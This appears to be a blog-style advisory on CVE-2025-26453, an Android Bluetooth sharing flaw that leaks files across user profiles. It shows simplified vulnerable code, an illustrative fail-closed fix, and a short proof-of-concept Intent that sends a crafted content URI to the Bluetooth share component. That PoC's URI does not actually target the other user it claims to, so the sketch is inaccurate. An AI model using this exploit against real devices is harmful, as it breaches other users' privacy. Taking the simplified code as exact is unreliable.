A new vulnerability, CVE-2025-26453, has been discovered in the Android operating system, specifically in the Bluetooth file sharing feature. It affects the BluetoothOppSendFileInfo.java file and could allow an attacker to access data from another user profile on the same device. Exploitation does not require user interaction or additional permissions, making it a serious risk if left unpatched. In this post, we’ll break down how it works, what the code looks like, and how it can be exploited.

What is CVE-2025-26453?

This vulnerability is due to a logic error in the method isContentUriForOtherUser within the BluetoothOppSendFileInfo.java file. If exploited, it allows a local attacker to leak data across user boundaries—potentially revealing sensitive information belonging to another user on the same Android device.

How the Exploit Works

Android devices are designed to support multiple user profiles, mainly for privacy. Each user's data is supposed to be isolated. Unfortunately, flaws like this can break that isolation.

Here’s a simplified version of the relevant method:

// This function should check if the given URI points to a file owned by another user.
private static boolean isContentUriForOtherUser(Uri uri, int userId) {
    // Logic error: the user check is not properly enforced
    int uriUserId = ContentProvider.getUserIdFromUri(uri);
    if (uriUserId != userId && uriUserId != USER_NULL) {
        return true;
    }
    // Missing: Should check for more edge cases
    return false;
}

The function does not correctly or completely verify whether the target URI belongs to another user.

- This oversight lets a local attacker (an app, for instance) craft a content URI that references another user's private data.
- No special permissions are needed. The attacker can simply use a malicious app that triggers a Bluetooth file transfer.
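A fail-closed variant of this kind of check, as an added example (not AOSP code and not the actual patch). It models the content URI with java.net.URI instead of android.net.Uri so it runs on a desktop JVM; the class name, method name and sample URIs are constructed for illustration. Where the simplified method above returns false for anything it cannot classify, this version rejects every URI it cannot prove belongs to the calling user.

```java
import java.net.URI;
import java.net.URISyntaxException;

// Added illustration: a desktop-JVM model, not AOSP code and not the actual patch.
public class CrossUserUriCheck {

    // Returns true (reject) unless the URI is provably a content URI that
    // resolves inside callerUserId's own profile.
    static boolean mustReject(String raw, int callerUserId) {
        final URI uri;
        try {
            uri = new URI(raw);
        } catch (URISyntaxException e) {
            return true; // unparseable input is never treated as "same user"
        }
        if (!"content".equals(uri.getScheme())) {
            return true; // this model only vouches for content:// URIs
        }
        if (uri.getHost() == null) {
            return true; // authority is not a plain [userinfo@]host form
        }
        // Validate the raw (still-encoded) user part so encoding cannot change the result.
        String userInfo = uri.getRawUserInfo();
        if (userInfo == null) {
            return false; // no user prefix: the URI resolves in the caller's profile
        }
        // Only a canonical decimal id is accepted; anything else is rejected, not ignored.
        if (!userInfo.matches("0|[1-9][0-9]{0,8}")) {
            return true;
        }
        return Integer.parseInt(userInfo) != callerUserId;
    }

    public static void main(String[] args) {
        int caller = 10; // constructed: the sending app runs in user 10
        String[] samples = { // constructed sample URIs; the authority is hypothetical
            "content://com.example.files/docs/1",
            "content://10@com.example.files/docs/1",
            "content://0@com.example.files/docs/1",
            "content://010@com.example.files/docs/1",
            "content://abc@com.example.files/docs/1",
            "file:///sdcard/notes.txt",
        };
        for (String s : samples) {
            System.out.println((mustReject(s, caller) ? "REJECT " : "allow  ") + s);
        }
    }
}
```

Saved as CrossUserUriCheck.java, it runs with `java CrossUserUriCheck.java` on Java 11 or later; only the first two samples are allowed, the rest are rejected.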

A malicious app running as User 10 (a secondary profile) could send a handcrafted intent to the Bluetooth sharing component:

Intent sendIntent = new Intent();
sendIntent.setAction(Intent.ACTION_SEND);
sendIntent.setType("text/plain");

// Craft a content URI that targets User 0's (owner's) file
// EXTRA_STREAM carries a Uri, so the string is parsed rather than passed as text
sendIntent.putExtra(Intent.EXTRA_STREAM, Uri.parse("content://com.android.providers.user/private_files/secret.txt"));

// Start the Bluetooth Share activity
context.startActivity(sendIntent);

Because the logic in isContentUriForOtherUser is broken, this malicious intent will be processed as if it’s from the current user, whereas it actually points to files belonging to another user.

As a result, BluetoothOppSendFileInfo could read the data and leak it to an external device or app.

- No special privileges: Any app can try this; no root or special permissions are required.

- Privacy risk: Sensitive files or information from a different user profile can be silently exfiltrated.

Protecting Yourself

- Update your device: Google and Android vendors have released patches for this issue. Updating to the latest security patch level is essential.

Conclusion

CVE-2025-26453 is a stark reminder that multi-user environments are hard to design and easy to break with small oversights. Android’s Bluetooth sharing relied on a logic check that wasn’t thorough enough, enabling local attackers to pierce user data boundaries. If you haven’t updated your Android device lately, now is the time.

Timeline

Published on: 09/04/2025 18:15:45 UTC
Last modified on: 09/08/2025 14:12:14 UTC